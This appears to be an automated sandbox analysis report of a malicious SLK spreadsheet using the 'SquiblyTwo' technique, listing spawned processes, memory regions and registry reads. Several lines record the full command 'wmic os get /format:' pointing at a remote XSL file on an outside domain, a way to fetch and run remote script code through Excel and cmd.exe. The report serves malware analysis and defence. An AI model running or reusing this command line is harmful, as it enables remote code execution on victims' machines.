SLK file using SquiblyTwo

Monitored Processes

Process Overview

ID	PID	Monitor Reason	Integrity Level	Image Name	Command Line	Origin ID
#1	0xed8	Analysis Target	Medium	excel.exe	"C:\Program Files\Microsoft Office\Office16\EXCEL.EXE"	-
#2	0xccc	Child Process	Medium	cmd.exe	CMD.EXE /C wmic os get /format:"https://itaxkenya.com/kra/tax_returns.xsl"	#1
#4	0xd94	Child Process	Medium	wmic.exe	wmic os get /format:"https://itaxkenya.com/kra/tax_returns.xsl"	#2
#8	0xcd4	Child Process	Medium	cmd.exe	CMD.EXE /C wmic os get /format:"https://itaxkenya.com/kra/tax_returns.xsl"	#1
#10	0x434	Child Process	Medium	wmic.exe	wmic os get /format:"https://itaxkenya.com/kra/tax_returns.xsl"	#8

Behavior Information - Sequential View

Process #1: excel.exe

Information	Value
ID	#1
File Name	c:\program files\microsoft office\office16\excel.exe
Command Line	"C:\Program Files\Microsoft Office\Office16\EXCEL.EXE"
Initial Working Directory	C:\Users\Nd9E1FYi\Desktop\
Monitor	Start Time: 00:00:31, Reason: Analysis Target
Unmonitor	End Time: 00:10:40, Reason: Terminated by Timeout
Monitor Duration	00:10:09
Remarks	No high level activity detected in monitored regions

OS Process Information

Information	Value
PID	0xed8
Parent PID	0x4f8 (c:\windows\explorer.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	X2VS1CUM\Nd9E1FYi
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x C88 0x C7C 0x C58 0x C3C 0x C2C 0x C18 0x C04 0x 36C 0x FF4 0x FF0 0x FD0 0x FA8 0x FA0 0x F94 0x F84 0x F30 0x F20 0x F18 0x F14 0x F10 0x F08 0x F04 0x F00 0x EFC 0x EF8 0x EF4 0x EF0 0x EEC 0x EE0 0x EDC 0x B10 0x 2DC 0x F1C 0x F74 0x DE4 0x B88 0x B50 0x C28 0x C40 0x C54 0x 774 0x F98

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	Readable	-
private_0x000000818fe00000	0x818fe00000	0x818fffffff	Private Memory	Readable, Writable	-
private_0x0000008190000000	0x8190000000	0x81900fffff	Private Memory	Readable, Writable	-
private_0x0000008190100000	0x8190100000	0x81901fffff	Private Memory	Readable, Writable	-
private_0x0000008190200000	0x8190200000	0x81902fffff	Private Memory	Readable, Writable	-
private_0x0000008190300000	0x8190300000	0x81903fffff	Private Memory	Readable, Writable	-
private_0x0000008190400000	0x8190400000	0x81904fffff	Private Memory	Readable, Writable	-
private_0x0000008190500000	0x8190500000	0x81905fffff	Private Memory	Readable, Writable	-
private_0x0000008190600000	0x8190600000	0x81906fffff	Private Memory	Readable, Writable	-
private_0x0000008190700000	0x8190700000	0x81907fffff	Private Memory	Readable, Writable	-
private_0x0000008190800000	0x8190800000	0x81908fffff	Private Memory	Readable, Writable	-
private_0x0000008190900000	0x8190900000	0x81909fffff	Private Memory	Readable, Writable	-
private_0x0000008190b00000	0x8190b00000	0x8190bfffff	Private Memory	Readable, Writable	-
private_0x0000008190c00000	0x8190c00000	0x8190cfffff	Private Memory	Readable, Writable	-
private_0x0000008190d00000	0x8190d00000	0x8190dfffff	Private Memory	Readable, Writable	-
private_0x0000008190f00000	0x8190f00000	0x8190ffffff	Private Memory	Readable, Writable	-
private_0x0000008191000000	0x8191000000	0x81910fffff	Private Memory	Readable, Writable	-
private_0x0000008191100000	0x8191100000	0x81911fffff	Private Memory	Readable, Writable	-
private_0x0000008191200000	0x8191200000	0x81912fffff	Private Memory	Readable, Writable	-
private_0x0000008191300000	0x8191300000	0x81913fffff	Private Memory	Readable, Writable	-
private_0x0000008191400000	0x8191400000	0x81914fffff	Private Memory	Readable, Writable	-
private_0x0000008191500000	0x8191500000	0x81915fffff	Private Memory	Readable, Writable	-
private_0x0000008191600000	0x8191600000	0x81916fffff	Private Memory	Readable, Writable	-
private_0x0000008191700000	0x8191700000	0x81917fffff	Private Memory	Readable, Writable	-
private_0x0000008191800000	0x8191800000	0x81918fffff	Private Memory	Readable, Writable	-
private_0x0000008191900000	0x8191900000	0x81919fffff	Private Memory	Readable, Writable	-
private_0x0000008191a00000	0x8191a00000	0x8191afffff	Private Memory	Readable, Writable	-
private_0x0000008191b00000	0x8191b00000	0x8191bfffff	Private Memory	Readable, Writable	-
private_0x0000008191c00000	0x8191c00000	0x8191cfffff	Private Memory	Readable, Writable	-
private_0x0000008191e00000	0x8191e00000	0x8191efffff	Private Memory	Readable, Writable	-
private_0x0000008191f00000	0x8191f00000	0x8191ffffff	Private Memory	Readable, Writable	-
private_0x0000008192000000	0x8192000000	0x81920fffff	Private Memory	Readable, Writable	-
pagefile_0x0000020f8a380000	0x20f8a380000	0x20f8a38ffff	Pagefile Backed Memory	Readable, Writable	-
private_0x0000020f8a390000	0x20f8a390000	0x20f8a396fff	Private Memory	Readable, Writable	-
pagefile_0x0000020f8a3a0000	0x20f8a3a0000	0x20f8a3b4fff	Pagefile Backed Memory	Readable	-
pagefile_0x0000020f8a3c0000	0x20f8a3c0000	0x20f8a3c3fff	Pagefile Backed Memory	Readable	-
pagefile_0x0000020f8a3d0000	0x20f8a3d0000	0x20f8a3d0fff	Pagefile Backed Memory	Readable	-
private_0x0000020f8a3e0000	0x20f8a3e0000	0x20f8a3e1fff	Private Memory	Readable, Writable	-
locale.nls	0x20f8a3f0000	0x20f8a4adfff	Memory Mapped File	Readable	-
pagefile_0x0000020f8a4b0000	0x20f8a4b0000	0x20f8a4b1fff	Pagefile Backed Memory	Readable	-
private_0x0000020f8a4c0000	0x20f8a4c0000	0x20f8a4c6fff	Private Memory	Readable, Writable	-
private_0x0000020f8a4d0000	0x20f8a4d0000	0x20f8a4d0fff	Private Memory	Readable, Writable	-
private_0x0000020f8a4e0000	0x20f8a4e0000	0x20f8a4e0fff	Private Memory	Readable, Writable	-
private_0x0000020f8a4f0000	0x20f8a4f0000	0x20f8a4f0fff	Private Memory	Readable, Writable	-
private_0x0000020f8a500000	0x20f8a500000	0x20f8a500fff	Private Memory	Readable, Writable	-
private_0x0000020f8a510000	0x20f8a510000	0x20f8a60ffff	Private Memory	Readable, Writable	-
pagefile_0x0000020f8a610000	0x20f8a610000	0x20f8a611fff	Pagefile Backed Memory	Readable	-
private_0x0000020f8a620000	0x20f8a620000	0x20f8a62ffff	Private Memory	-	-
pagefile_0x0000020f8a630000	0x20f8a630000	0x20f8a631fff	Pagefile Backed Memory	Readable	-
pagefile_0x0000020f8a640000	0x20f8a640000	0x20f8a641fff	Pagefile Backed Memory	Readable	-
pagefile_0x0000020f8a650000	0x20f8a650000	0x20f8a651fff	Pagefile Backed Memory	Readable	-
pagefile_0x0000020f8a660000	0x20f8a660000	0x20f8a661fff	Pagefile Backed Memory	Readable	-
pagefile_0x0000020f8a670000	0x20f8a670000	0x20f8a671fff	Pagefile Backed Memory	Readable	-
pagefile_0x0000020f8a680000	0x20f8a680000	0x20f8a680fff	Pagefile Backed Memory	Readable, Writable	-
pagefile_0x0000020f8a690000	0x20f8a690000	0x20f8a691fff	Pagefile Backed Memory	Readable	-
pagefile_0x0000020f8a6a0000	0x20f8a6a0000	0x20f8a6cdfff	Pagefile Backed Memory	Readable, Writable	-
private_0x0000020f8a6d0000	0x20f8a6d0000	0x20f8a6dffff	Private Memory	Readable, Writable	-
pagefile_0x0000020f8a6e0000	0x20f8a6e0000	0x20f8a867fff	Pagefile Backed Memory	Readable	-
pagefile_0x0000020f8a870000	0x20f8a870000	0x20f8a9f0fff	Pagefile Backed Memory	Readable	-
pagefile_0x0000020f8aa00000	0x20f8aa00000	0x20f8bdfffff	Pagefile Backed Memory	Readable	-
private_0x0000020f8be00000	0x20f8be00000	0x20f8be00fff	Private Memory	Readable, Writable	-
private_0x0000020f8be10000	0x20f8be10000	0x20f8be10fff	Private Memory	Readable, Writable	-
pagefile_0x0000020f8be20000	0x20f8be20000	0x20f8bedbfff	Pagefile Backed Memory	Readable	-
private_0x0000020f8bee0000	0x20f8bee0000	0x20f8befffff	Private Memory	Readable, Writable	-
office.odf	0x20f8bf00000	0x20f8c0b8fff	Memory Mapped File	Readable	-
pagefile_0x0000020f8c0c0000	0x20f8c0c0000	0x20f8c0c3fff	Pagefile Backed Memory	Readable	-
private_0x0000020f8c0d0000	0x20f8c0d0000	0x20f8c0d6fff	Private Memory	Readable, Writable	-
pagefile_0x0000020f8c0e0000	0x20f8c0e0000	0x20f8c0e1fff	Pagefile Backed Memory	Readable	-
private_0x0000020f8c0f0000	0x20f8c0f0000	0x20f8c1effff	Private Memory	Readable, Writable	-
private_0x0000020f8c1f0000	0x20f8c1f0000	0x20f8c1f0fff	Private Memory	Readable, Writable	-
private_0x0000020f8c200000	0x20f8c200000	0x20f8c200fff	Private Memory	Readable, Writable	-
private_0x0000020f8c210000	0x20f8c210000	0x20f8c210fff	Private Memory	Readable, Writable	-
msointl30.dll	0x20f8c220000	0x20f8c22efff	Memory Mapped File	Readable	-
private_0x0000020f8c230000	0x20f8c230000	0x20f8c236fff	Private Memory	Readable, Writable	-
pagefile_0x0000020f8c240000	0x20f8c240000	0x20f8c240fff	Pagefile Backed Memory	Readable, Writable	-
private_0x0000020f8c250000	0x20f8c250000	0x20f8c25ffff	Private Memory	Readable, Writable	-
pagefile_0x0000020f8c260000	0x20f8c260000	0x20f8c264fff	Pagefile Backed Memory	Readable, Writable	-
pagefile_0x0000020f8c270000	0x20f8c270000	0x20f8c270fff	Pagefile Backed Memory	Readable	-
private_0x0000020f8c280000	0x20f8c280000	0x20f8c28ffff	Private Memory	Readable, Writable	-
mso40uires.dll	0x20f8c290000	0x20f8c597fff	Memory Mapped File	Readable	-
mso99lres.dll	0x20f8c5a0000	0x20f8cec0fff	Memory Mapped File	Readable	-
msores.dll	0x20f8ced0000	0x20f91d0efff	Memory Mapped File	Readable	-
xlintl32.dll	0x20f91d10000	0x20f92d51fff	Memory Mapped File	Readable	-
sortdefault.nls	0x20f92d60000	0x20f93096fff	Memory Mapped File	Readable	-
pagefile_0x0000020f930a0000	0x20f930a0000	0x20f93591fff	Pagefile Backed Memory	Readable, Writable	-
pagefile_0x0000020f935a0000	0x20f935a0000	0x20f935a0fff	Pagefile Backed Memory	Readable	-
pagefile_0x0000020f935b0000	0x20f935b0000	0x20f935b0fff	Pagefile Backed Memory	Readable, Writable	-
private_0x0000020f935c0000	0x20f935c0000	0x20f935c0fff	Private Memory	Readable, Writable	-
private_0x0000020f935d0000	0x20f935d0000	0x20f935d0fff	Private Memory	Readable, Writable	-
private_0x0000020f935e0000	0x20f935e0000	0x20f935e0fff	Private Memory	Readable, Writable	-
pagefile_0x0000020f935f0000	0x20f935f0000	0x20f935f1fff	Pagefile Backed Memory	Readable	-
pagefile_0x0000020f93600000	0x20f93600000	0x20f93600fff	Pagefile Backed Memory	Readable, Writable	-
private_0x0000020f93610000	0x20f93610000	0x20f93610fff	Private Memory	Readable, Writable	-
private_0x0000020f93620000	0x20f93620000	0x20f93620fff	Private Memory	Readable, Writable	-
private_0x0000020f93630000	0x20f93630000	0x20f9363ffff	Private Memory	Readable, Writable	-
msointl.dll	0x20f93640000	0x20f937bafff	Memory Mapped File	Readable	-
pagefile_0x0000020f937c0000	0x20f937c0000	0x20f93fbffff	Pagefile Backed Memory	Readable, Writable	-
private_0x0000020f93fc0000	0x20f93fc0000	0x20f940bffff	Private Memory	Readable, Writable	-
private_0x0000020f940c0000	0x20f940c0000	0x20f942bffff	Private Memory	Readable, Writable	-
private_0x0000020f942c0000	0x20f942c0000	0x20f943bffff	Private Memory	Readable, Writable	-
pagefile_0x0000020f943c0000	0x20f943c0000	0x20f9444bfff	Pagefile Backed Memory	Readable	-
private_0x0000020f94450000	0x20f94450000	0x20f94450fff	Private Memory	Readable, Writable	-
pagefile_0x0000020f94460000	0x20f94460000	0x20f9446bfff	Pagefile Backed Memory	Readable, Writable	-
pagefile_0x0000020f94470000	0x20f94470000	0x20f94471fff	Pagefile Backed Memory	Readable	-
pagefile_0x0000020f94480000	0x20f94480000	0x20f9448bfff	Pagefile Backed Memory	Readable, Writable	-
normidna.nls	0x20f94490000	0x20f944a1fff	Memory Mapped File	Readable	-
comdlg32.dll.mui	0x20f944b0000	0x20f944bcfff	Memory Mapped File	Readable	-
pagefile_0x0000020f944c0000	0x20f944c0000	0x20f944c1fff	Pagefile Backed Memory	Readable	-
private_0x0000020f944d0000	0x20f944d0000	0x20f944d0fff	Private Memory	Readable, Writable	-
pagefile_0x0000020f944e0000	0x20f944e0000	0x20f944e1fff	Pagefile Backed Memory	Readable	-
explorerframe.dll.mui	0x20f944f0000	0x20f944f6fff	Memory Mapped File	Readable	-
private_0x0000020f94500000	0x20f94500000	0x20f94503fff	Private Memory	Readable, Writable	-
private_0x0000020f94510000	0x20f94510000	0x20f94513fff	Private Memory	Readable, Writable	-
private_0x0000020f94520000	0x20f94520000	0x20f94523fff	Private Memory	Readable, Writable	-
private_0x0000020f94530000	0x20f94530000	0x20f94530fff	Private Memory	Readable, Writable	-
private_0x0000020f94540000	0x20f94540000	0x20f94542fff	Private Memory	Readable, Writable	-
pagefile_0x0000020f94550000	0x20f94550000	0x20f9456efff	Pagefile Backed Memory	Readable, Writable	-
pagefile_0x0000020f94570000	0x20f94570000	0x20f9458efff	Pagefile Backed Memory	Readable, Writable	-
private_0x0000020f94590000	0x20f94590000	0x20f94590fff	Private Memory	Readable, Writable	-
private_0x0000020f945a0000	0x20f945a0000	0x20f945a0fff	Private Memory	Readable, Writable	-
private_0x0000020f945b0000	0x20f945b0000	0x20f945b0fff	Private Memory	Readable, Writable	-
private_0x0000020f945c0000	0x20f945c0000	0x20f949bffff	Private Memory	Readable, Writable	-
pagefile_0x0000020f949c0000	0x20f949c0000	0x20f949c1fff	Pagefile Backed Memory	Readable	-
private_0x0000020f949d0000	0x20f949d0000	0x20f949d0fff	Private Memory	Readable, Writable	-
~fontcache-system.dat	0x20f949e0000	0x20f94a55fff	Memory Mapped File	Readable	-
~fontcache-fontface.dat	0x20f94a60000	0x20f95a5ffff	Memory Mapped File	Readable	-
~fontcache-s-1-5-21-2172869166-1497266965-2109836178-1000.dat	0x20f95a60000	0x20f9625ffff	Memory Mapped File	Readable	-
segoeui.ttf	0x20f96260000	0x20f9633efff	Memory Mapped File	Readable	-
d2d1.dll.mui	0x20f96340000	0x20f96381fff	Memory Mapped File	Readable	-
private_0x0000020f96390000	0x20f96390000	0x20f9678ffff	Private Memory	Readable, Writable	-
private_0x0000020f96790000	0x20f96790000	0x20f96f8ffff	Private Memory	Readable, Writable	-
segoeuil.ttf	0x20f96f90000	0x20f97063fff	Memory Mapped File	Readable	-
seguisb.ttf	0x20f97070000	0x20f97152fff	Memory Mapped File	Readable	-
segoeuib.ttf	0x20f97160000	0x20f9723bfff	Memory Mapped File	Readable	-
private_0x0000020f97240000	0x20f97240000	0x20f97240fff	Private Memory	Readable, Writable	-
pagefile_0x0000020f97250000	0x20f97250000	0x20f97325fff	Pagefile Backed Memory	Readable, Writable	-
private_0x0000020f97330000	0x20f97330000	0x20f97330fff	Private Memory	Readable, Writable	-
pagefile_0x0000020f97340000	0x20f97340000	0x20f97375fff	Pagefile Backed Memory	Readable, Writable	-
pagefile_0x0000020f97380000	0x20f97380000	0x20f9738ffff	Pagefile Backed Memory	Readable, Writable	-
pagefile_0x0000020f97390000	0x20f97390000	0x20f9739ffff	Pagefile Backed Memory	Readable, Writable	-
pagefile_0x0000020f973a0000	0x20f973a0000	0x20f973affff	Pagefile Backed Memory	Readable, Writable	-
private_0x0000020f973b0000	0x20f973b0000	0x20f977b7fff	Private Memory	Readable, Writable	-
private_0x0000020f977c0000	0x20f977c0000	0x20f97bd0fff	Private Memory	Readable, Writable	-
private_0x0000020f97be0000	0x20f97be0000	0x20f97fe2fff	Private Memory	Readable, Writable	-
private_0x0000020f97ff0000	0x20f97ff0000	0x20f97ff0fff	Private Memory	Readable, Writable	-
private_0x0000020f98000000	0x20f98000000	0x20f98000fff	Private Memory	Readable, Writable	-
private_0x0000020f98010000	0x20f98010000	0x20f9808ffff	Private Memory	Readable, Writable	-
c_1255.nls	0x20f98090000	0x20f980a0fff	Memory Mapped File	Readable	-
staticcache.dat	0x20f980b0000	0x20f990effff	Memory Mapped File	Readable	-
cversions.2.db	0x20f990f0000	0x20f990f3fff	Memory Mapped File	Readable	-
For performance reasons, the remaining 335 entries are omitted. The remaining entries can be found in flog.txt.

Process #2: cmd.exe

Information	Value
ID	#2
File Name	c:\windows\system32\cmd.exe
Command Line	CMD.EXE /C wmic os get /format:"https://itaxkenya.com/kra/tax_returns.xsl"
Initial Working Directory	C:\Users\Nd9E1FYi\Desktop\
Monitor	Start Time: 00:00:47, Reason: Child Process
Unmonitor	End Time: 00:10:40, Reason: Terminated by Timeout
Monitor Duration	00:09:53

OS Process Information

Information	Value
PID	0xccc
Parent PID	0xed8 (c:\program files\microsoft office\office16\excel.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	X2VS1CUM\Nd9E1FYi
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x E0 0x E24

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	Readable	-
private_0x000000194dd00000	0x194dd00000	0x194ddfffff	Private Memory	Readable, Writable	-
private_0x000000194de00000	0x194de00000	0x194dffffff	Private Memory	Readable, Writable	-
private_0x000000194e000000	0x194e000000	0x194e0fffff	Private Memory	Readable, Writable	-
private_0x000001ebe75c0000	0x1ebe75c0000	0x1ebe75dffff	Private Memory	Readable, Writable	-
pagefile_0x000001ebe75c0000	0x1ebe75c0000	0x1ebe75cffff	Pagefile Backed Memory	Readable, Writable	-
private_0x000001ebe75d0000	0x1ebe75d0000	0x1ebe75d6fff	Private Memory	Readable, Writable	-
pagefile_0x000001ebe75e0000	0x1ebe75e0000	0x1ebe75f4fff	Pagefile Backed Memory	Readable	-
pagefile_0x000001ebe7600000	0x1ebe7600000	0x1ebe7603fff	Pagefile Backed Memory	Readable	-
pagefile_0x000001ebe7610000	0x1ebe7610000	0x1ebe7610fff	Pagefile Backed Memory	Readable	-
private_0x000001ebe7620000	0x1ebe7620000	0x1ebe7621fff	Private Memory	Readable, Writable	-
private_0x000001ebe7630000	0x1ebe7630000	0x1ebe772ffff	Private Memory	Readable, Writable	-
locale.nls	0x1ebe7730000	0x1ebe77edfff	Memory Mapped File	Readable	-
private_0x000001ebe77f0000	0x1ebe77f0000	0x1ebe77f6fff	Private Memory	Readable, Writable	-
private_0x000001ebe7970000	0x1ebe7970000	0x1ebe797ffff	Private Memory	Readable, Writable	-
sortdefault.nls	0x1ebe7980000	0x1ebe7cb6fff	Memory Mapped File	Readable	-
pagefile_0x00007df5ffa10000	0x7df5ffa10000	0x7ff5ffa0ffff	Pagefile Backed Memory	-	-
pagefile_0x00007ff648e50000	0x7ff648e50000	0x7ff648f4ffff	Pagefile Backed Memory	Readable	-
pagefile_0x00007ff648f50000	0x7ff648f50000	0x7ff648f72fff	Pagefile Backed Memory	Readable	-
cmd.exe	0x7ff649110000	0x7ff649169fff	Memory Mapped File	Readable, Writable, Executable	-
kernelbase.dll	0x7ffc14550000	0x7ffc14737fff	Memory Mapped File	Readable, Writable, Executable	-
msvcrt.dll	0x7ffc164b0000	0x7ffc1654cfff	Memory Mapped File	Readable, Writable, Executable	-
kernel32.dll	0x7ffc17120000	0x7ffc171ccfff	Memory Mapped File	Readable, Writable, Executable	-
ntdll.dll	0x7ffc17400000	0x7ffc175c0fff	Memory Mapped File	Readable, Writable, Executable	-

Threads

Thread 0xe0

Category	Operation	Information	Count	Logfile
Module	Get Handle	module_name = c:\windows\system32\cmd.exe, base_address = 0x7ff649110000	1	Fn
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x7ffc17120000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetThreadUILanguage, address_out = 0x7ffc17143270	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	3	Fn
File	Open	filename = STD_INPUT_HANDLE	2	Fn
Environment	Get Environment String	-	2	Fn Data
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 0, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = AutoRun, data = 64, type = REG_NONE	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 64, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = AutoRun, data = 9, type = REG_NONE	1	Fn
Module	Get Filename	process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\SYSTEM32\CMD.EXE, size = 260	1	Fn
Environment	Get Environment String	name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Environment	Get Environment String	name = PROMPT	1	Fn
Environment	Set Environment String	name = PROMPT, value = $P$G	1	Fn
Environment	Get Environment String	-	1	Fn Data
Environment	Get Environment String	name = COMSPEC, result_out = C:\Windows\system32\cmd.exe	1	Fn
Environment	Get Environment String	name = KEYS	1	Fn
File	Get Info	filename = C:\Users\Nd9E1FYi\Desktop, type = file_attributes	2	Fn
Environment	Set Environment String	name = =C:, value = C:\Users\Nd9E1FYi\Desktop	1	Fn
Environment	Get Environment String	-	1	Fn Data
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x7ffc17120000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CopyFileExW, address_out = 0x7ffc17148940	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = IsDebuggerPresent, address_out = 0x7ffc17147460	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetConsoleInputExeNameW, address_out = 0x7ffc145a6e50	1	Fn
Environment	Get Environment String	name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Process	Create	process_name = C:\Windows\System32\Wbem\WMIC.exe, os_pid = 0xd94, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL	1	Fn
Environment	Set Environment String	name = COPYCMD	1	Fn
Environment	Get Environment String	-	1	Fn Data

Process #4: wmic.exe

769

676

Information	Value
ID	#4
File Name	c:\windows\system32\wbem\wmic.exe
Command Line	wmic os get /format:"https://itaxkenya.com/kra/tax_returns.xsl"
Initial Working Directory	C:\Users\Nd9E1FYi\Desktop\
Monitor	Start Time: 00:00:48, Reason: Child Process
Unmonitor	End Time: 00:10:40, Reason: Terminated by Timeout
Monitor Duration	00:09:52

OS Process Information

Information	Value
PID	0xd94
Parent PID	0xccc (c:\windows\system32\cmd.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	X2VS1CUM\Nd9E1FYi
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x DF0 0x 3B0 0x E44 0x E4C 0x E58 0x E54 0x D84 0x E68 0x E6C 0x 13C 0x A44 0x ABC 0x DDC 0x DD8 0x EC4 0x CC4

Region

Name	Start VA	End VA	Type	Permissions	Actions
msvcr80.dll	0x5cfe0000	0x5d0a8fff	Memory Mapped File	Readable, Writable, Executable	-
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	Readable	-
private_0x0000003500000000	0x3500000000	0x35001fffff	Private Memory	Readable, Writable	-
private_0x0000003500200000	0x3500200000	0x350027ffff	Private Memory	Readable, Writable	-
private_0x0000003500280000	0x3500280000	0x35002fffff	Private Memory	Readable, Writable	-
private_0x0000003500300000	0x3500300000	0x350037ffff	Private Memory	Readable, Writable	-
private_0x0000003500380000	0x3500380000	0x35003fffff	Private Memory	Readable, Writable	-
private_0x0000003500400000	0x3500400000	0x350047ffff	Private Memory	Readable, Writable	-
private_0x0000003500480000	0x3500480000	0x35004fffff	Private Memory	Readable, Writable	-
private_0x0000003500500000	0x3500500000	0x350057ffff	Private Memory	Readable, Writable	-
private_0x00000233e1000000	0x233e1000000	0x233e101ffff	Private Memory	Readable, Writable	-
pagefile_0x00000233e1000000	0x233e1000000	0x233e100ffff	Pagefile Backed Memory	Readable, Writable	-
private_0x00000233e1010000	0x233e1010000	0x233e1016fff	Private Memory	Readable, Writable	-
pagefile_0x00000233e1020000	0x233e1020000	0x233e1034fff	Pagefile Backed Memory	Readable	-
pagefile_0x00000233e1040000	0x233e1040000	0x233e1043fff	Pagefile Backed Memory	Readable	-
pagefile_0x00000233e1050000	0x233e1050000	0x233e1050fff	Pagefile Backed Memory	Readable	-
private_0x00000233e1060000	0x233e1060000	0x233e1061fff	Private Memory	Readable, Writable	-
locale.nls	0x233e1070000	0x233e112dfff	Memory Mapped File	Readable	-
private_0x00000233e1130000	0x233e1130000	0x233e1136fff	Private Memory	Readable, Writable	-
pagefile_0x00000233e1140000	0x233e1140000	0x233e1140fff	Pagefile Backed Memory	Readable	-
pagefile_0x00000233e1150000	0x233e1150000	0x233e1150fff	Pagefile Backed Memory	Readable	-
private_0x00000233e1160000	0x233e1160000	0x233e11dffff	Private Memory	Readable, Writable	-
private_0x00000233e1160000	0x233e1160000	0x233e11bffff	Private Memory	Readable, Writable	-
pagefile_0x00000233e1160000	0x233e1160000	0x233e1161fff	Pagefile Backed Memory	Readable	-
pagefile_0x00000233e1170000	0x233e1170000	0x233e1170fff	Pagefile Backed Memory	Readable, Writable	-
msxml3r.dll	0x233e1180000	0x233e1180fff	Memory Mapped File	Readable	-
private_0x00000233e1190000	0x233e1190000	0x233e11affff	Private Memory	-	-
private_0x00000233e11b0000	0x233e11b0000	0x233e11bffff	Private Memory	Readable, Writable	-
wmic.exe.mui	0x233e11c0000	0x233e11cffff	Memory Mapped File	Readable	-
private_0x00000233e11d0000	0x233e11d0000	0x233e11dffff	Private Memory	Readable, Writable	-
private_0x00000233e11e0000	0x233e11e0000	0x233e11e0fff	Private Memory	Readable, Writable	-
private_0x00000233e11f0000	0x233e11f0000	0x233e11f0fff	Private Memory	Readable, Writable	-
pagefile_0x00000233e1200000	0x233e1200000	0x233e1200fff	Pagefile Backed Memory	Readable	-
pagefile_0x00000233e1200000	0x233e1200000	0x233e1203fff	Pagefile Backed Memory	Readable	-
private_0x00000233e1210000	0x233e1210000	0x233e130ffff	Private Memory	Readable, Writable	-
rpcss.dll	0x233e1310000	0x233e13ecfff	Memory Mapped File	Readable	-
ole32.dll	0x233e1310000	0x233e1452fff	Memory Mapped File	Readable	-
private_0x00000233e1310000	0x233e1310000	0x233e14dffff	Private Memory	Readable, Writable	-
private_0x00000233e1310000	0x233e1310000	0x233e144ffff	Private Memory	Readable, Writable	-
private_0x00000233e1310000	0x233e1310000	0x233e138ffff	Private Memory	Readable, Writable	-
imm32.dll	0x233e1310000	0x233e1348fff	Memory Mapped File	Readable	-
private_0x00000233e1310000	0x233e1310000	0x233e1310fff	Private Memory	Readable, Writable	-
private_0x00000233e1320000	0x233e1320000	0x233e1320fff	Private Memory	Readable, Writable	-
